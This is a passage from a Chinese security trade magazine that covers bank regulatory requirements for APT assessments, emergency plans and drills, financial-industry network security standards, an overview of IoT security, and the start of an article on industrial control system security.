等保测评是以符合等级保护的要求为目的, 而风险评估是以风险管理为目的, 两者参照的标准 工作的流程以及最终的报告内容都有所不同 工作要求 高级持续性威胁专项评估 安全挑战 2015 年初针对金融高管的勒索邮件开始大规模传播造成严重损失 2015 年 SWIFT 系统漏洞导致惊天银行大劫案导致过亿美元损失 ;2016 年 7 月台湾第一银行 ATM 机 自动吐钱 事件导致 8000 余万新台币被盗 ; 文件要求 政策性银行 大型银行 股份制银行 邮储银行还要针对高级持续性威胁 精准式网络攻击进行安全评估, 对威胁和攻击进行分类场景设定, 有针对性的排查系统漏洞 分析脆弱性 ; 形成应对此类攻击的防护措施专项评估报告 工作内容分解如下 : 评估目标评估要点评估工具报告要点 范围涉及互联网业务系统 ( 包括客户端 移动应用 ) 门户网站 第三方外联系统, 数据中心基础设施 通讯网络以及后台系统 ( 包含管理信息系统 办公系统 ), 本次专项评估的范围广, 业务类型多, 建议银行业金融机构先做好全面的业务梳理工作, 借助外部专业化的 政策性银行 大型银行 股份制银行 邮储银行的信息系统 高级持续性威胁 精准式网络攻击 分场景设定分析 未知威胁分析 统一威胁管理 全网态势感知 技术防御体系监控平台测试工具仿真平台 评估机构完成安全评估 专家问答 Q: 渗透测试 等保测评等的报告能否作为风险评估的报告提交? 专家建议 不同与以往的病毒 木马攻击, 高级持续性威胁 ( 简 称 APT) 攻击具有针对性, 渗透力强, 潜伏期长, 攻击覆盖面广, 传统技术措施很难进行辨认, 同时造成的损失更加庞大 从近几年 38

41 行业热点 由 APT 攻击造成的安全事件可以看出,APT 攻击具有很强的针对性, 已经成为网络安全的首要威胁, 而由于银行业金融机构的特殊性, 已成为 APT 攻击的主要目标 建议银行业金融机构参考业内成熟经验, 开展对网络 安全设备 主机及终端等综合多方面的防护水平评估, 如采取从行内办公网段对行内指定的服务器主机进行入侵和权限提升测试, 尝试包含应用配置测试 登录验证测试 指定内网网络域访问控制测试等科目, 并对行内信息科技相关员工进行专业的针对 APT 攻击形式的安全知识培训, 做到知己知彼, 才能做好 APT 攻击防御 专家问答 Q : 什么是高级持续性威胁攻击? 部署防火墙 入侵防护 防毒墙等设备能否满足要求? 如何构建针对高级持续性威胁的防御体系? A : 高级持续性威胁攻击, 又称 APT 攻击, 是指融合情报 黑客技术 社会工程等各种手段, 针对有价值的信息资产或通过 IT 系统控制的重要控制系统, 发起的长期 复杂而专业攻击, 主要的目标就是就是长期占有系统的控制权并不断的窃取敏感信息 由于 APT 攻击具有极强的隐蔽性, 攻击者往往会利用多种攻击技术 攻击手段, 不仅会利用已知安全漏洞 木马后门, 还可能会利用 0DAY 漏洞 特种木马, 通常会结合社会工程学的相关知识, 并且攻击路径复杂, 掩盖攻击行踪, 躲避常规安全产品的检测, 并且整个攻击过程时间跨度较大, 部署传统的防护设备无法满足防御的要求 APT 攻击无法通过单一的安全产品和安全技术进行有效的检测 防护, 建议银行业金融机构结合现有的安全防护体系, 补充专业的高级持续性威胁分析系统, 并完善管理体系, 只有建立以安全技术与安全管理相结合的纵深防护体系, 才能抵御 APT 攻击的威胁 工作要求 网络安全应急预案评估 安全挑战 2009 年 DNS 解析故障导致 六省断网事件 ; 银行互联网业务遭受黑客 DDOS 攻击导致服务中断 ; Gozi 银行木马短短几天攻击 24 家银行盗窃数百万美元 ;2016 年 7 月亦庄某数据中心故障致多家金融机构设备宕机, 服务全部中断 文件要求 银行业金融机构要对网络和重要信息系统应对网络安全攻击的应急预案开展评估, 针对主要网络安全攻击场景, 评估预案的全面性 有效性 可操作性 根据评估结果, 建立应急预案的制定 修订计划并组织实施 工作内容分解如下 : 评估目标工作要点常见场景 银行业金融机构应急预案的 细化网络安全突发事件分级标准细分网络攻击类型及安全威胁场景应急准备要全面 人员职责要明确 拒绝服务攻击网站漏洞攻击木马病毒攻击 全面性 有效业务和科技跨部门协同机制充分有效 邮件钓鱼攻击 性 可操作性 高级持续性威胁攻击 1 机房供电 空调 通信 关键设备 高级持续性威胁攻击断电断网物理攻击 专家建议 网络安全应急预案的制定可实现预防或最大程度地 减少银行业突发事件给金融业及其他产业带来的经济损失, 预防或 39

42 行业热点 最大程度的减轻银行业突发事件给金融消费者权益带来的损害, 维护国家金融稳定 建议银行业金融机构可根据 中华人民共和国银行业监督管理法 中国银监会 银行业突发事件应急预案 等相关规章和标准, 结合近年银行业发生的安全事件和面临的安全风险, 制定符合自身组织架构的网络安全应急预案, 明确各个部门的责任, 准备措施以及应对突发事件的配合机制 专家问答 Q : 银行在建立之初就制定了完善的 突发事件应急预案, 可以直接提交吗? 开展一次全面的网络安全风险专项评估, 针对内外部网络攻击威胁, 评估信息系统提供持续服务的能力和数据安全保护水平, 重点关注 安全管理制度和网络安全防护技术体系的有效性, 摸清底数 查找 短板, 制定威胁应对方案 评估内容分解如下 : 评估目标 工作要点 常见场景 拒绝服务攻击 银行业金融 建立常态化开展网络安全应急演练制度 网站漏洞攻击 机构 针对主要网络安全攻击场景进行演练 木马病毒攻击 邮件钓鱼攻击 A : 由于银行业近几年处于高速发展阶段, 新业务新技术较多, 如网上银行 手机银行 微信银行 直销银行等新业务, 虚拟化桌面技术 云平台等新兴技术也不断在银行业中展开实践和推广, 面临的安全风险也与以往不尽相同, 因此需要结合实际情况对 突发事件应急预案 进行更新 工作要求 网络安全应急演练 1 开展应对高级可持续性威胁 精准式网政策性银络攻击的演练, 以真实业务接管为目标, 行 大型银加强攻防对抗模拟和跨部门协同演练行 股份制 2 开展银行同业 外包服务商 外联机构银行 邮储的协同演练, 或与公安 电信部门及其他银行国家信息安全 公共事业管理部门开展联防演练 攻防演练 协同演练 联防演练 安全挑战 2011 年 4 月韩国农协银行服务器数据被黑客删除导致全国 1154 个分行业务中断, 而异地灾备服务器没有按照应急预案及时恢复数据导致业务无法恢复 国内某银行业务系统故障导致 其他机构 加强数据中心关键基础设施服务 重要信 息系统故障场景的业务连续性演练, 积 极开展真切实换演练 断网断电 物理攻击 异地灾备 业务中断, 而异地容灾中心并未及时切换 2013 年 12 月花旗银行 一名内部员工恶意删除 10 台核心路由器配置导致 110 个分行网络异常, 占花旗银行所有分支机构总数的 90%, 备份路由器发挥了作用, 没有造成全面停运, 但还是导致了网络和分支机构出现 拥堵 情况 文件要求 银行业金融机构要对数据中心基础设施 信息系统 注 : 对该项工作突出的单位, 银监会将工作情况纳入监管评级结果中 专家建议 网络安全应急演练可直接验证网络安全应急预案的全面性 有效性和可操作性, 确保发生安全事件, 网络安全应急预 40

43 行业热点 案能够发挥作用, 保障信息系统的安全 稳定 持续运行, 从而避免出现 纸上谈兵 的情况 建议银行金融机构借助同业的丰富经验和专业安全厂家的力量, 进行全面的 多场景的应急演练, 调动相关部门资源积极配合完成演练工作, 才能保证在真实发生安全事件时, 合理有效 配合有序的应对各类威胁 专家问答 Q : 网络安全应急演练主要涉及哪些方面? A : 网络安全应急演练的制定可参考 网络安全应急预案, 根据事件类型和场景, 结合银行业务场景, 制定网络安全应急演练方案, 如门户网站被篡改 网上银行遭受拒绝服务供给无法访问 内部网络遭受未知病毒攻击 银行网络或电力中断等, 更大范围的演练可协同本地其他银行 电信运营商 公安机关等机构进行协同演练 本次通知要求比较具体和全面, 覆盖了风险管理的评估 整改 演练 应急各个环节, 并且与中央网信办的要求同时下发, 对银行业金融机构提出个更高的安全要求 附 : 工作分解表 工作内容 具体要求 关键词 报告要求 时间要求 互联网业务系统 ( 包括客户端和移 动应用 ) 门户网站 第三方外联系 问题描述 风险 网络和信息系统安 技术防护措施 统 数据中心基础设施 通讯网络 分析 风险等级 8 月 31 日 全风险评估 安全管理措施 以及后台系统 ( 包括管理信息系统 整改措施 办公系统 ) 针对高级持续性威胁 精准式网络高级持续性威 高级持续性威胁 监控平台 测试 攻击进行安全评估, 对威胁和攻击胁 精准式网络 11 月 5 日 专项评估 工具 仿真平台 进行分类场景设定 攻击 防护措施 细化网络安全突发事件分级标准, 细化事件分级应急准备充分 网络安全应急预案 根据不同的网络攻击 安全威胁场标准 分场景组织职责明确 9 月 30 日 评估及修订完善 景进行评估 评估 部门协作 建立常态化开展网络安全应急演练攻防对抗模工作开展情况纳 网络安全应急演练的制度, 针对主要网络安全攻击场拟 跨部门协入年度监管评 6 月 30 日 景, 开展应急演练 同演练 级结果 网络安全风险专对组织开展 应对措施落实 专项 不走过场 认真 项评估治理总结治理 应急演练 关键基础设施安 工作成果汇报 11 月 5 日 实施 确保成效 报告 全检查 防控成效和经验进行总结 面向公众提供网络信息服务或支撑 关键信息基础设重要行业运行的信息系统或工业控功能 范围 数加强领导 积极 7 月 27 日 施登记表 制系统, 一旦损坏将影响行业正常据存储 危害性准备 认真配合 运行 完成责任制落实 日常管理 防护 提升自主可控全面排查 突出中央和国家机关网应急工作 教育培训 技术产品使水平和安全防问题 切实减少 8 月 31 日络安全自查表用 商用密码使用等网络安全检查 护能力威胁银监会对此次专项评估治理工作开展情况进行质量抽查, 并作为年度信息科技监管评级的重要参考依据, 抽查方案另行通知 41

44 行业热点 解读金融行业等保标准中的网络安全要求 金融技术部俞琛 关键词 : 人民银行 JR/T 安全等保增强性安全要求摘要 : 为了配合金融行业机构做好网络安全运维保障, 有效防范网络入侵 网络拒绝服务攻击, 及网络非法监听等恶意网络行为, 有必要了解相应合规要求 因此, 本文将梳理金融等保标准中对于网络安全方面的要求, 特别对网络运行维护 网络设备日常管理 网络监测的相关条款需采取的措施进行说明 民银行发布 金融行业信息系统信息安全等级保护实施指引 人 JR/T 是 金融行业信息系统等级保护 系列 标准中的第一项标准 其中, 金融行业增强安全保护类 (F 类 ) 作为 金融行业的增强性安全要求分布在 S A G 类的要求中, 该类要求 是在结合等级保护及金融行业相关规定的基础上进行补充和完善 金融等保中 网络安全 相关条款原文 : 应保证网络各个部分的带宽满足业务高峰期需要 ; 应绘制与当前运行情况相符的网络拓扑结构图 ; 应根据各部门的工作职能 重要性和所涉及信息的重要程度等因素, 划分不同的子网或网段, 并按照方便管理和控制的原则为各子网 网段分配地址段, 生产网 互联网 办公网之间都应实现有效隔离 ; 应在网络区域边界 ( 互联网区域边界 外部区域边界和内部区域边界 ) 对网络最大流量数及网络并发连接数进行监控 ; 42

45 行业热点 网络设备应按最小安全访问原则设置访问控制权限 ; 应能够对非授权设备私自联到内部网络的行为进行检查, 准确定出位置, 并对其进行有效阻断 ; 应能够对内部网络用户私自联到外部网络的行为进行检查, 准确定出位置, 并对其进行有效阻断 ; 应在网络边界处监视以下攻击行为 : 端口扫描 强力攻击 木马后门攻击 拒绝服务攻击 缓冲区溢出攻击 注入式攻击 IP 碎片攻击和网络蠕虫攻击等 ; 当检测到攻击行为时, 记录攻击源 IP 攻击类型 攻击目的 攻击时间, 在发生严重入侵事件时应提供报警 ; 应在与外单位和互联网连接的网络边界处对恶意代码进行检测和清除, 应定期对恶意代码防护设备进行代码库升级和系统更新 ; 应对网络设备的管理员登录地址进行限制 ; 网络设备用户的标识应唯一 ; 主要网络设备应对同一用户选择两种或两种以上组合的鉴别技术来进行身份鉴别 ; 当对网络设备进行远程管理时, 应采取必要措施防止鉴别信息在网络传输过程中被窃听 ; 应定期对网络设备的配置文件进行备份, 发生变动时应及时备份 ; 应定期对网络设备运行状况进行检查, 定期检查并锁定或撤销网络设备中不必要的用户账号 对网络设备系统自带的的服务端口进行梳理, 关掉不必要的系统服务端口, 并建立相应的端口开放审批 制度 ; 应定期检验网络设备软件版本信息, 避免使用软件版本中出现安全隐患 ; 网络安全 相关条款解读 : 可通过网络拓扑结构自动发现 绘制工具, 验证实际的网络拓扑结构和网络拓扑结构图是否一致 对网络设备进行远程管理时, 应采取必要措施防止鉴别信息在网络传输过程中被窃听 建议逐步对只支持 telnet 的设备进行淘汰, 并且在今后采购中将支持 SSH 作为其中一条强制要求 网络边界处部署监测网络入侵行为设备, 可通过采取渗透测试试图访问未授权的资源, 验证访问控制措施和网络入侵行为防护措施对未授权的访问行为的控制是否有效 网络部署边界完整性检查设备, 可通过接入未授权移动设备测试是否能够对非授权设备私自联到网络的行为进行检查, 并准确定出位置, 对其进行有效阻断 ( 如产生非法接入的动作, 查看边界完整性检查设备是否能准确的发现, 准确的定位并产生阻断 ) 网络设备用户的标识应唯一, 可采取堡垒机统一管理运维访问, 建议每季度检查并锁定或撤销网络设备中多佘的用户账号及调试账号 对主要互联网出口进行抗 DDoS 防护, 可采取运营商线路大流量清洗与本地小流量攻击防护结合方式 定期对网络设备的配置文件进行备份, 建议每周或网络变更割接前进行备份, 每季度检查并书面记录网络设备软件版本信息 43

46 行业热点 物联网安全概述 创新中心张星 关键词 : 物联网安全物联网安全体系结构物联网研究项目及标准摘要 : 物联网在给大家带来便利的同时也带来了隐忧, 物联网的安全既构建在互联网的安全上, 也有因为其业务环境而具有自身的特点 物联网的体系结构通常包括底层用来感知的感知层, 中间数据传输的网络层以及上面的应用层 国外有不少研究项目和组织在进行物联网安全的研究 本文是物联网安全系列文章的第一篇 物联网安全概述 一. 引言 在 1999 年,MIT AutoID 研究室的早 Kevin Ashton 在研究将射频识别信 息与互联网相连接的时候首先提到了物联网 的概念 ; 同年, 在美国召开的移动计算和网 络国际会议就提出, 传感网是下一个世纪 人类面临的又一个发展机遇 ;2005 年 11 月 17 日, 信息社会世界峰会 (WSIS) 上, 国际电信联盟 ( ITU) 发布了 ITU 互联网报 告 2005 : 物联网, 正式提出了 物联网 的概念 ;2009 年 8 月, 温家宝总理到无锡 物联网产业研究院考察时, 明确指示在物联 网的发展中, 要早一点谋划未来, 早一点攻破核心技术, 并且明确要求尽快建立中国的传感信息中心, 或者叫 感知中国 中心 物联网已经被视为继计算机和互联网之后的第三次信息技术革命 1.1 物联网带来的隐忧那么什么是物联网呢? 维基百科对于物联网 ( Internet of Things) 的定义为物联网是将物理设备 车辆 建筑物和一些其它嵌入电子设备 软件 传感器等事物与网络连接起来, 使这些对象能够收集和交换数据的网络 物联网允许远端系统通过现有的网 络基础设施感知和控制事物, 可以将物理世界集成到基于计算机系统, 从而提高效率 准确性和经济利益 经过二十多年的发展, 物联网已经逐步融入到我们的生活中来 从应用于家庭的智能恒温器, 智能电灯等设备, 到与身体健康相关的智能穿戴设备 每一种智能设备的出现, 都大大便利了人们的生活 但是物联网在给人们的生活带来便利的同时, 也会给人们带来种种隐忧 2014 年, 研究人员演示了如何在 15 秒的时间内入侵家里的恒温控制器, 通过对恒温控制器数据 44

47 行业热点 的收集, 入侵者就可以了解到家中什么时候有人, 他们的日程安排是什么等信息 许多智能电视带有摄像头, 即便电视没有打开, 入侵智能电视的攻击者可以使用摄像头来监视你和你的家人 攻击者在获取对于智能家庭中的灯光系统的访问后, 除了可以控制家庭中的灯光外, 还可以访问家庭的电力, 从而可以增加家庭的电力消耗, 导致极大的电费账单 种种安全问题提示人们, 在享受物联网带来的方便快捷的同时, 也要关注物联 1.2 物联网安全与互联网安全的对比 物联网 互联网 体系结构 分为感知层 网络层和应用层 比物联网少了感知层 操作系统 一些领域如 : 工业控制对系统数据传输 信息处理的实时性要求较高 一些领域如 : 智能家 大部分系统的实时性要求不高, 信息传输允许延迟, 可以停机和重启恢复 居对系统的实时性要求不高 通信协议系统升级 Zigbee, 蓝牙,WiFi 也会用到互联网的协议 TCP/IP HTTP FTP SMTP 等 (HTTP HTTPS XMPP 等 ) 一些专有系统兼容性差 软硬件升级较困难, 采用通用系统 兼容性较好, 软硬件一般很少进行系统升级, 如需升级可能需要整升级较容易, 且软件系统升级较频繁个系统升级换代 网的安全问题 CSA 发布的白皮书 Security Guidance for Early Adopters of the Internet of Things (IoT) 中提到 IoT 带来如下新的挑战 : (1) 增加的隐私问题经常让人感到困惑 (2) 平台安全的局限性使得基本的安全控制面临挑战 (3) 普遍存在的移动性使得追踪和资产管理面临挑战 运维管理漏洞分析开发流程隐私问题 不仅关注互联网所关注的问题, 还关注对物联互联网运维通常关注系统响应 性能 网设备远程控制和管理 通用操作系统针对行业特定协议的漏洞和嵌入式操作系统 TCP/IP 协议不像传统 IT 信息系统软件在开发时拥有严格的开发时拥有严格的安全软件开发规范安全软件开发规范及安全测试流程及安全测试流程物联网的很多应用都与人们的日常生活相关, 其应用过程中需要收集人们的日常生活信息, 用户网络行为 偏好方面的信息 利用该信息可以直接或者间接地通过连接查询追溯到某个人 (4) 设备的数量巨大使得常规的更新和维护操作面临挑战 (5) 基于云的操作使得边界安全不太有效 网络的组织形态 无线传感网传感器节点大规模分布在未保护或网络节点大多分布在受保护的环境 敌对环境中 ; 无线多跳通信 ; 设备资源受限 中 ; 设备资源充足 物理安全节点物理安全较薄弱主机大多分布在受保护的环境中 表 1.1 物联网和互联网对比 45

48 行业热点 物联网是互联网的延伸, 因此物联网的安全也是互联网安全的延伸, 物联网和互联网的关系是密不可分 相辅相成的 但是物联网和互联网在网络的组织形态 网络功能以及性能上的要求都是不同的, 物联网对实时性 安全可信性 资源保证等方面有很高的要求, 物联网与互联网的区别在表 1.1 中得到体现 物联网的安全既构建在互联网的安全上, 也有因为其业务环境而具有自身的特点 总的来说, 物联网安全和互联网安全的关系体现在 : 物联网安全不是全新的概念, 物联网安全比互联网安全多了感知层, 传统互联网的安全机制可以应用到物联网, 物联网安全比互联网安全更复杂 二. 物联网安全的体系结构对于物联网安全的体系结构的理解有助于快速找到安全的切入 络接入 现场总线 卫星通信等 网络层的承载是核心网, 通常是 IPv4 网络 网络层是物联网信息和数据的传输层, 将感知层采集到的数据传输到应用层进行进一步的处理 应用层对通过网络层传输过来的数据进行分析处理, 最终为用户提供丰富的特定服务, 如智能电网 智能物流 远程医疗 智能交通 智能家居 智慧城市等 依靠感知层提供的数据和网络层的传输, 进行相应的处理后, 可能再次通过网络层反馈给感知层 应用层对物联网信息和数据进行融合处理和利用, 达到信息最终为人所使用的目的 物联网的安全架构可以根据物联网的架构分为感知层安全 网络层安全和应用层安全 如图 1.1, 感知层安全的设计中需要考虑物 点, 本节将首先介绍物联网的体系结构, 然后引出物联网安全的体系结构 物联网的体系结构通常认为有 3 个层次 : 底层是用来感知 ( 识别 定位 ) 的感知层, 中间是数据传输的网络层, 上面是应用层 感知层包括以传感器为代表的感知设备 以 RFID 为代表的识别设备 GPS 等定位追踪设备以及可能融合部分或全部上述功能的智能终端等 感知层是物联网信息和数据的来源, 从而达到对数据全面感知的目的 网络层包括接入网和核心网 接入网可以是无线近距离接入, 如无线局域网 ZigBee 蓝牙 红外, 也可以是无线远距离接入, 如移动通信网络 WiMAX 等, 还可能是其他形式的接入, 如有线网 图 1.1 物联网安全体系结构 46

49 行业热点 联网设备的计算能力 通信能力 存储能力等受限, 不能直接在物理设备上应用复杂的安全技术, 网络层安全用于保障通信安全, 应用层则关注于各类业务及业务的支撑平台的安全 三. 研究项目和标准化组织 物联网安全项目物联网安全项目 ( Secure Internet of Things Project) 是一个跨学科的研究项目, 包括斯坦福大学 UC 伯克利大学和密歇根大学的计算机系和电子工程系 项目为期 5 年, 目标是 : (1) 研究和定义新的密码学计算模型和安全机制以确保物联网设备在未来数十年的安全 (2) 研究和实现安全 开源的软硬件框架来对物联网应用进行原型和构建, 使其可以正确使用这些新的机制 研究涉及三个方面 : (1) 分析如何将物理世界的巨大的数据流与现有数据集成? (2) 安全泛在的传感和分析系统如何保护用户安全? (3) 软硬件系统什么样的软硬件系统可以使得对于物联网安全应用的开发和现在的 Web 应用一样容易? 2015 年 6 月确定了第一年的研究计划 : (1)20 年的安全物联网设备周边的计算机基础设施发展迅速 ( 我们会更换手机, 服务器也会去更新 ), 但是设备本身依然处于部署状态, 因此必须能够准备好以适应和经受安全局面的改变 20 年的安全方面的工作主要有三个方面 : 第一, 设计未来嵌入式 SoC 所需要的密码学原语 密码学趋于计算密集, 因此如果运行在软件中会消耗大量的嵌入式设备的功耗, 硬件的支持使得密码学更有效率, 但是能够在未来 20 年使用的加密算法会与今天正在使用的有很大的不同 在未来, 量子计算机会成为现实, 因此物联网设备需要可以抵抗量子攻击的签名算法 由于嵌入式 SoC 的成本降低, 可以在其中加入可编程密码部件的支持 第二, 关于随机数生成 随机数是密码学和计算机安全的基础, 然而, 物联网设备使用的低功耗微控制器中很少具备现代处理器中用于生成随机数的硬件部件 ( 如 x86 的 RDRAND 和 RDSEED 指令 ) 此外, 正确和安全的生成随机数需要精心设计 物联网安全的一个关键是快速而价格低廉的随机数生成方法, 这使得任何人可以轻易并入设备中 我们将探索软硬件结合的方法来在嵌入式设备的整个生命周期提供足够的随机性 第三, 设计和实现新的 安全的嵌入式操作性系统 当下的嵌入式系统主要使用低层次的 C 语言编写 在 20 世纪末, 这导致了缓冲区溢出和许多其他的安全漏洞 桌面和服务器上的操作系统使用多种技术和硬件机制来抵抗这些攻击, 但是嵌入式处理器并不具 47

50 行业热点 备这样的能力 我们的假设是使用一个类型安全的系统语言可以提供一个可证明安全的操作系统内核, 从而允许多个不可信的应用 ( 如智能手表上加载的多个应用 ) 同时运行 (2) 应用开发框架大部分的物联网应用遵从 MGC 架构, 由三部分组成, 嵌入式设备 (embedded devices) 网关设备 ( Gateway device) 如手机和云中 ( Cloud) 或网络中的服务器 这些设备使用自己的语言 操作系统和应用框架, 在这些系统之间验证和建立安全特性很困难 我们将研究新的操作系统 网络协议和工具来使得一个通过所有这些设备的应用依旧可以维持其安全特性 如果安全很难使用, 开发人员则会选择不使用 因此, 我们的目标是使得安全物联网应用的开发和现代的网站开发一样容易 我们将研究如何支持软件定义的硬件 (software-defined hardware), 使得软件工程师可以根据代码中所需的库和特性来指定物联网设备 现在的做法是使用数据合成技术来自动读取数以千计的数据手册, 从而形成一个丰富的数据库 (3) 物联网网关网关是几乎所有物联网应用的关键部分 它提供了低功耗的无线网络和互联网之间的桥梁 我们正在探索网关需要提供给用户和应用怎样的特点和抽象 当前关注于两个问题 : 通信可见性 (communication visibility) 和应用沙盒化 (application sandboxing) 假设在未来你的家庭中有 100 到 1000 的物联网设备, 它们在做什么? 当前这些设备都是黑盒, 例如, 你并不能看到你的 Nest 恒温器正在发送什么, 由于它与 Nest 服务器是通过加密的端到端连接的 与笔记本和电话不同的是, 用户并不能在恒温器上安装新的安全证书以使得用户可以看到它的数据 我们假设这是物联网系统的一个基本需求 : 用户可以看到他们的设备是如何通信的以及通信内容 从技术角度来看, 物联网网关应该提供物联网设备正在与什么样的服务和系统进行通信的信息 这些收集的数据可以提供有价值的关于什么是正常行为 它们正在做什么的洞见 这种检测流量的能力并不仅仅是查看发送的数据包有多少字节, 当用户授权网关对于设备的权限时, 网关具 有窥探流量内容的能力 这种窥探的能力不能违反完整性, 同时网关在看到流量的同时也不能伪造数据 达到这两个目标需要新的密码学和协议机制 研究人员期望物联网网关可以发展成富应用平台 (rich application platforms), 就像当下的手机一样 有两个理由支持这种观点 : 一是对于用户体验和交互性来说拥有本地接口和数据存储是非常有用的, 二是即使与互联网的连接中断, 这些应用也需要持续工作 物理网关对于嵌入式设备可以提供有用的安全保护 低功耗操作和受限的软件支持意味着频繁的固件更新代价太高甚至不可能实现 反而, 网关可以主动更新软件 ( 高级防火墙 ) 以保护嵌入式设备免受攻击 实现这些特性需要重新思考运行在网关上的操作系统和其机制 研究人员正在探索类似 Intel SGX 和 ARM TrustZone 这样的技术如何对网关和其上的应用提供新的安全保护 TRUST TRUST 是斯坦福大学的计算机安全实验室的一个项目, 针对的是物理基础设施的安全研究 该项目定位于下一代的 SCADA 48

51 行业热点 和网络嵌入式系统, 它们控制关键的物理基础设施 ( 如电网 天然气 水利 交通等 ) 以及未来的基础设施 ( 如智能建筑 ) 和结构 ( 如 active-bridges, 它的结构完整性依赖于动态控制或 actuators) 该研究具有前瞻性, 随着工业化与信息化的融合, 原有的工业控制环境发生了变化, 为了更好地抵抗来自互联网的攻击, 有必要设计下一代的 SCADA 和网络嵌入式系统 OWASP Internet of Things Project 开放式 Web 应用程序安全项目 ( OWASP,Open Web Application Security Project) 是一个组织, 它提供有关计算机和互联网应用程序的公正 实际 有成本效益的信息 其目的是协助个人 企业和机构来发现和使用可信赖软件 OWASP 物联网项目的目标是帮助制造商 开发人员 消费者更好地理解与物联网相关的安全问题, 使得用户在构建 部署或者评估物联网技术时可以更好地制定安全决策 该项目包括物联网攻击面 脆弱性 固件分析 工控安全等子项目 CSA 云安全联盟 ( Cloud Security Alliance,CSA), 成立于 2009 年 3 月 31 日, 其成立的目的是为了在云计算环境下提供最佳的安全方案 CSA 包含很多个工作组, 其中的物联网工作组 ( cloudsecurityalliance.org/group/internet-of-things/) 关注于理解物联网部署的相关用例以及定义可操作的安全实施指南 主要关注于如下方面 : (1) 分析不同行业物联网实现的用例 ; (2) 物联网安全实现的最佳实践 ; (3) 实现物联网安全控制和云控制矩阵的映射 ; (4) 确定物联网设备和实现的威胁 ; (5) 确定安全标准和物联网安全实践之间的差距 ; (6) 确定技术解决方案和物联网安全实践之间的差距 ; (7) 研究物联网安全新方法 ; (8) 与其他 CSA 组织合作共同化解物联网安全控制的冲突 ; (9) 保证支持物联网的云基础设施和服务的安全 ; (10) 保护边界设备安全, 防止通过边界设备进入企业内部 ; (11) 物联网的审计 验证 访问控制 授权 库存管理 隐私和风险管理的解决方案 NIST 美国国家标准与技术研究院 (National Institute of Standards and Technology,NIST) 直属美国商务部, 从事物理 生物和工程方面的基础和应用研究, 以及测量技术和测试方法方面的研究, 提供标准 标准参考数据及有关服务, 在国际上享有很高的声誉国家安全和经济安全依赖于可靠的关键基础设施的运作 网络空间安全对关键基础设施系统会造成很大的影响, 为了能够处理这个威胁,NIST 提出了网络安全架构 这个架构是由一系列的工业标准和工业最佳实践组成的, 目的是帮助企业管理网络空间安全威胁 这个架构是业务驱动的, 来指导网络空间安全活动, 并使公司将考虑网络空间安全威胁作为公司威胁管理的一部分, 架构主要包括三个部分 : 架构核心 架构轮廓和架构实现层 这个架构使公司 -- 49

52 行业热点 不管规模是多少 面临的网络安全威胁有多严重或者网络空间安全问题的复杂性 都可以应用这些规则和最佳实践来进行风险管理以提高关键基础设施的安全性和恢复力 IoT Security Foundation IoTS 的成员包括 ARM 华为等公司 他们的目标是帮助物联网实现安全性, 使得物联网能够被广泛使用, 同时他的优点能够被最大化的利用 为了实现这个目标, 他们要提升技术理论水平和了解业界的最佳实践, 为那些生产或者使用物联网设备的人提供支持 包含五个工作组 : (1) 自认证方案这个工作组的目标是为创建低成本的 易于实现的并且与目标相匹配的自认证系统进行需求分析, 以提高物联网产品的安全标准 (2) 面向用户产品这个工作组的目标是为不同层次的用户设备提供与之相对应的最佳安全实践指南 (3) 修补现有的设备低成本的 IoT 系统主要的挑战是如何保证系统在他的生命周期中的可维护性和可更新性, 这个工作组的目标是为系统部署受限的资源要素提供最佳实践指南 (4) 负责任的披露当一个研究人员在你的产品中发现了一个脆弱点以后将会发生什么? 这个工作组的目标是建立一个交流通道, 并且建立一个最佳实践框架给研究人员和公司来遵从 (5) 物联网蓝图这个工作组寻求在更高的层次, 在系统范围或者端到端的角度建立物联网映射, 找到系统脆弱性在哪里, 并指导 IoTSF 未来的工作方向 四. 物联网安全需求及对策物联网安全产品的核心在于技术, 由于物联网的安全是互联网安全的延伸, 那么我们可以利用互联网已有的安全技术, 结合物联网安全问题的实际需要, 改进已有技术, 将改进后的技术应用到物联网中, 从而解决物联网的安全问题 此外物联网还有其独特性, 如终端设备众多, 设备之间缺乏信任的问题, 互联网中现有的技术难以解决此类问题, 所以我们还需要探索一些新的技术来解决物联网中特有的新问题 此外, 由于物联网将许多原本与网络隔离的设备连接到网络中, 大大增加了设备遭受攻击的风险 同时物联网中的设备资源受限, 很多设备在设计时较少考虑安全问题 还有物联网中协议众多, 没有统一标准等等这些安全隐患都可能被黑客利用, 造成极大的安全问题, 所以我们需要利用一些漏洞挖掘技术对物联网中的服务平台, 协议 嵌入式操作系统进行漏洞挖掘, 先于攻击者发现并及时修补漏洞, 有效减少来自黑客的威胁, 提升系统的安全性 因此主动发掘并分析系统安全漏洞, 对物联网安全具有重要的意义 通过对物联网安全需求和对策的分析, 我们总结出以下需要重点关注的技术 本章将分别从已有技术在物联网环境中的应用 新技术的探索和物联网相关设备 平台 系统的漏洞挖掘和安全设计三个方面介绍物联网安全技术研究的一些思路 在下一期文章中, 我们将讨论物联网安全的需求及对策 50

53 行业热点 工控系统的综合保障思考 ICS 产品管理团队张学聪 关键词 : 工控安全防护工控安全事件工控安全保障工控威胁情报工控安全预警平台摘要 : 工控安全防护面临了几大难题,1 目前手段难以有效识别发现安全事件,2 难以将业务记录与安全事件进行融合,3 某一点确认的安全事件不能及时在组织内有效协同,4 不同设备之间的信息不通用, 这些问题的解决需要从工控系统生命周期着手, 而其中与业务相关的功能安全至关重要 国计民生息息相关的自动化领域正面临着诸如两化融合 工与业 4.0 智能制造等概念的不断冲击和洗礼, 工业化和信息 化的结合给封闭的工业控制系统打开了一扇天窗, 在享受信息共享 与管理便利的同时, 影响工业控制系统安全的潘多拉魔盒早已被悄 然打开 传统信息系统固有的安全风险不可避免的被带入到了封闭 可靠的工业控制系统当中, 这样一来, 和工控系统相关的信息安全 事件就一件接一件的发生了 愈演愈烈的工控安全事件 早在 21 世纪初期, 工控系统安全事件就已经在美国 俄罗斯等 发达国家发酵 如 2000 年的 GAzprom 公司天然气输送管道网络 SCADA 系统任意控制事件 ;2003 年美国俄亥俄州 Davis-Besse 的核电厂控制网络 SQL SERVER 蠕虫感染事件 ;2007 年加拿大水利 SCADA 控制系统恶意入侵事件 这些攻击事件无不证实了工控系统的脆弱性和风险性 在我国, 也曾出现过备受关注的工控系统信息安全事件, 比如 2003 年, 龙泉 政平 鹅城换流站控制系统发现病毒, 原因是外国工程师在系统调试中用笔记本电脑上网引入了恶意代码, 所幸并没有造成严重的后果 虽然工控安全事件时有发生, 但并未真正引起人们的足够重视, 这种形势一直延续到了 2010 年, Stunex 震网病毒事件的发生给全世界的工控系统敲醒了警钟 2010 